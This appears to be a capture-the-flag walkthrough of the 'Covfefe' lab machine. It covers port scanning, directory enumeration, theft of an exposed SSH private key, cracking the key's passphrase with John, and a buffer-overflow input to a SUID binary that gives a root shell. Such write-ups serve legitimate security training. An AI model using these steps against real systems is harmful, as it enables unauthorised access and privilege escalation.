# Covfefe ## Nmap ``` sudo nmap 192.168.184.10 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) 80/tcp open http nginx 1.10.3 31337/tcp open Elite? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` I started off with port 80 and was unable to identify any directories or files. The default page for the port goes to installation for nginix. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eb56aa406d780744e2a9bf2ef2e5ef0e44f14b86%2Fimage.png?alt=media) When attempting to browse to port 31337 we are given a 404 not found error. I then ran `dirsearch.py` against the port using the command below which discovered what appeared to be a users home directory contents. ``` python3 dirsearch.py -u http://192.168.184.10:31337 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-92f1e2f1eb6f1b2cfae0d390120930bdfd11e897%2Fimage.png?alt=media) Checking out the /.ssh directory appears to list sub folder contents. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba9c5ff8a6aa8ede9b406f1eebe704630bb9ebca%2Fimage.png?alt=media) I first downloaded the id\_rsa and then authorized\_keys. ``` http://192.168.184.10:31337/.ssh/id_rsa http://192.168.184.10:31337/.ssh/authorized_keys ``` Viewing the contents of authorized\_keys shows the user simon having a key in the file. First use `chmod` on the id\_rsa to set the correct permissions. ``` chmod 600 id_rsa ``` When attempting to use the key to connect by SSH we are prompted to provide a passphrase. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cad27b435350946435d4aff134e20c290209e980%2Fimage.png?alt=media) Using ssh2john we can convert the key to a hash which can be sent to John for cracking. ``` /usr/share/john/ssh2john.py id_rsa > /home/kali/Desktop/hash sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9da1af80542cfd908f6efa688380af972637c2d6%2Fimage.png?alt=media) Now that we have the password `starwars` for for the key we can try signing in again. ``` ssh -i id_rsa simon@192.168.184.10 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-858fb5c417db879f44806521e7cd8c4bd9a886e5%2Fimage.png?alt=media) I then transferred over `linpeas` and executed. Linpeas then identified the binary `/usr/local/bin/read_message` as having the SUID bit set. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ec601720678891f82ac698e9203364734ace6b84%2Fimage.png?alt=media) Running the binary and entering the name 'Simon' produces the following output: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3ef8c0f339284826fea60eb0b2956a3bf2ae9c81%2Fimage.png?alt=media) As per the message we can read the source code. Listing the contents of the root directory shows the source code file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e096a9511bd6e24b0186c457e68902db82ebaa54%2Fimage.png?alt=media) It looks like as per the script it will read the first 5 characters to validate if correct but, has a total buffer for 20. We can try to overflow the buffer to execute a command. Running the following when prompted to do so by the binary will give us a root shell. ``` Simonaaaaaaaaaaaaaaa/bin/sh ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8612c21bb4ed7b6a0d2142170d915b7b3a7b5409%2Fimage.png?alt=media)